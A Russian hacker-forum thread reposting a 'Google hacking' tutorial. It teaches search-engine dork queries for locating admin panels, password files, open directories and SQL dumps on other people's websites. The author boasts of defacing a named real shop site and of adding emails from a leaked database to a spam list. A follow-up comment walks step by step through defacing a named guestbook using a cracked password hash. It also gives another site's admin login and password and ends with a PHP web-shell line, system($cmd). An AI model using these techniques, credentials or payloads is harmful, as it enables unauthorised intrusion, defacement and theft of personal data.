Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker **** ***** ***** **** ***** ****

Hacker-Forum!®

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Hacker-Forum!® » Информация☝ » Google-Hack: Поиск как метод атаки


Google-Hack: Поиск как метод атаки

Сообщений 1 страница 2 из 2

1

Как правило каждый день, и в сущности не по одному разу, нам приходится сталкиваться с необходимостью использовать средства поисковых систем, для получения какой-либо информации. А задумывался ли ты, что именно с помощью поиска во многих случаях ломаются сайты и форумы? То, что владелец портала хочет скрыть от посторонних глаз, зачастую остается открыто пронырливому поисковому боту. А уж его данные становятся достоянием общественности. Как взломать сайт с помощью google.com, и насколько это реально, мы сейчас и рассмотрим подробнее... На теории и на практике.

За google.com уже давно закрепилось звание истинного хакерского поисковика. И дело не в том, что сам поиск в нем очень хорошо реализован, хотя этот факт никто не оспаривает. Часто ли ты заглядываешь по ссылке, расположенной рядом с формой ввода запроса: "Advanced Search", или в русской вариации "Расширенный поиск"? Если нет - самое время этим заняться. Или, по крайней мере, просто изучить язык запросов google.

Ты не поверишь, но, в свое время, сайт салона связи "Элефант" (http://elefant21.ru/) был "взломан" мной с помощью обычного поискового запроса:

allintitle:"Администраторская часть" site:ru

Директива site указывает в данном случае, что искать нужно в русской доменной зоне. allintitle позволит выудить только те страницы, в заголовке которых находится искомое словосочетание. В итоге мы получим в самых первых сайденных страницах путь к админке сайта - http://elefant21.ru/admin/items/1909.html. Сейчас ты уже можешь наблюдать там надпись "Нет доступа, user it not logged" и форму ввода пароля и логина. Это сейчас. Тогда же этого не было, и вся защита была построена в расчете на то, что пользователь просто напросто не найдет входа в админку, ведь кроме администраторов о ней никто не знает. Кроме, как оказалось, гугла.

В итоге, через десять минут исходный код был подправлен, на сайт был залит логотип Уруру, прописанны ссылки на него, и сайт украшала гордая надпись "Hacked by Уруру-Team. Kiss you, Bill". Ничего сверхестественного! Такие ошибки часто встречаются на самописных движках. А то, что этот движок был самописным, легко понять, пропарсив исходный код страницы на предмет именных переменных характерных какому-либо движку, или даже просто метатегу generator.

Бывает, что администраторы пытаются противостоять этому, запретив индексирование какой-либо части сайта, путем размещения соответсвующего правила в файл robots.txt. Но опять же... Хакер он ведь не робот. А этот файл всегда доступен для чтения (иначе как его прикажете читать поисковикам). И расположен он обычно в самом корне сайта, например:

http://hack-academy.ru/robots.txt

Глянув, какие каталоги запрещены к индексации, интерес к ним может только разгорется, вдруг там приватные сплоиты раздают нахаляву? А запрет на сканирование поисковиками, совсем не распространяется на Хакера. Это совсем не одно и то же, что и физический запрет на чтение.

Кстати, заменив "Администраторская часть" на "Секретная зона" иногда удавалось получить доступ к частной порно коллекции. Да-да, из тех, за которые просят отправить платную sms на такой-то номер. Но мы отвлеклись... =)

Например, ты заходишь в Hack-News нашего портала и видишь надпись, что найдена уязвимость в таком-то паблик скрипте, например CMS или форуме. И указанна пошаговая последовательность действий, которые приведут к полному контролю сайта. Теперь осталось найти все сайты, на которых стоит эта версия движка, простым запросом, например, если под ударом оказался форум типа vBulletin 3.7.3, его и вбиваем в поисковый запрос:

Powered by vBulletin 3.7.3

Еще желательно установить в опциях вывод не 10 результатов на страницу, а например 50. Так будет проще.

Также гугл может выдавать в ответ на запрос файлы одного конкретного типа. Например ты, найдя уязвимость в популярном движке для Интернет-Магазинов, а именно в скрипте покупки товара (пусть это будет getitem.php), где не фильтруется какой либо параметр, допустим id выбранного товара (itemid), можешь составить запрос типа:

filetype:php inurl:itemid

И найти все Интернет-магазины, юзающие данный скрипт. Или, зная, что некая программа (например софтина супер секретного интернет-банка) хранит зашифрованные или не очень пароли в файле pswd.xdh. Если к такому файлу кто-то непреднамеренно, допустим по неосторожности, открыл доступ, то запросом:

filetype:xdh inurl:pswd

мы сможем их найти. Прочитать. Расшифровать/Сбрутить пароль... И наслаждаться победой.

Пример, когда открыт для чтения каталог, содержащий n-ое количество файлов. Такую страницу веб-сервер помечает жирной надписью в самом верху "Index of _имя каталога_". Составив запрос "Index.of /passwords", к примеру, у нас есть призрачный шанс посмотреть директорию с именем "passwords" какого либо ресурса. В папке с таким вкусным именем вполне может находится не менее сладкий контент. В запросе между Index и of стоит точка. Это общепринятое обозначение пробела в гугле. Из той же области очень заманчиво выглядит запрос:

Index.of /admin site:ru

Разумеется директивы ru может и не быть. Просто в русскоязычных сайтах тебе, наверное будет удобней копаться. Но если проблем с английским языком нету - смело выбрасывай ее. Тогда ассортимент найденых сайтов увеличится в тысячи раз!

Базы данных тоже часто доступны для чтения. Без шуток! Вот например запрос:

filetype:sql inurl:pass

Среди прочих ссылок находим: http://img.downbt.com/pass.sql. Открываем и оп-па!

Перед нами дамп базы данных с красивым именем "password". И тут же структура таблицы free_users:

free_user (
  id int(10) NOT NULL auto_increment,
  username varchar(15) NOT NULL default '',
  pwd varchar(32) NOT NULL default '',
  email varchar(60) NOT NULL default '',
  q varchar(10) default '0',
  a varchar(50) default NULL,
  group_id varchar(50) default '1',
  admin_g smallint(4) default '0',
  PRIMARY KEY  (id),
  KEY username (username),
  KEY email (email)
) TYPE=MyISAM;

Затем идет множество запросов "INSERT INTO free_user", которые и заполняют объявленные поля таблицы различными данными.

Кстати, данные из полей "KEY email (email)" я уже добавил в персональную спам базу. Авось и пригодится. =) Интересно, не правда ли? И это я далеко, в общем-то, не лазил... Все "вкусные" запросы не перечислишь. Да и варьируются они в общем-то от твоих нужд и потребностей. В общем, потренируйся, навык пригодится.

hack-academy.ru
...
Опубликовано в разделе: Начинающему Хакеру Просмотров: 5684
Комментариев: 2

pubmaster [31 марта 2009 13:54]

Дефейс за 2 минуты! Добро пожаловать! Вы давно хотели сделать дефейс, но ничего не получалось? Сегодня мы разберем дефейсы гостевых, скажу сразу – это будет непросто, а очень просто! Приступим! Для начала попробуем найти уязвимые гостевые, открываем http://www.google.ru/ и вбиваем такой запрос: filetype:dat passwd Команда filetype:dat passwd найдет все файлы с расширением dat, слово passwd говорит о том, что надо искать файл passwd.dat где и хранятся пароли от админки гостевой! Выбираем гостевую по вкусу… я взял: http://www.otsema.ru/gostevaya2/guest.php заходим в каталог (может называться, и по-другому смотрите сами) http://www.otsema.ru/gostevaya2/ Находим файл passwd.dat (хотя гугл сразу дает ссылку на http://www.otsema.ru/gostevaya2/ passwd.dat) открываем его и видим что - то похожее на это: Копируем хеш пароля 32946e1a7a215c7cbe69554fcaeb98b7 расшифровываем (надеюсь - это проблем не составит), получается 999222, теперь назад http://www.otsema.ru/gostevaya2/ и ищем файл admin.php нашли? Открываем…. Вводим логин samsn и пароль 999222. Теперь мы в админке – там можно редактировать дизайн и менять настройки, но не всегда - бывает так, иногда стоит запрет на редактирование, а иногда админка просто не дает возможностей это сделать как здесь: http://www.sozdaysait.net.ru/uchot/admin.php?login Логин: admin Пасс: 1234 переходим на вкладку дизайн стираем все и пишем: [tittle][h1][tt] Hacked by net ne vasy[tt][/h1][/tittle] Теперь в окне гостевой будет надпись Hacked by net ne vase. Можно взять код и помощнее c использованием java и сделать очень красивый дефейс … Так же можем добавить и такой код: [?system($cmd);?] ……………………………………………………………………………………………………………………..... На
сегодня все …… знак "[" заменяет знак меньше, знак "]" заменяет больше.

2


Вы здесь » Hacker-Forum!® » Информация☝ » Google-Hack: Поиск как метод атаки


Рейтинг форумов | Создать форум бесплатно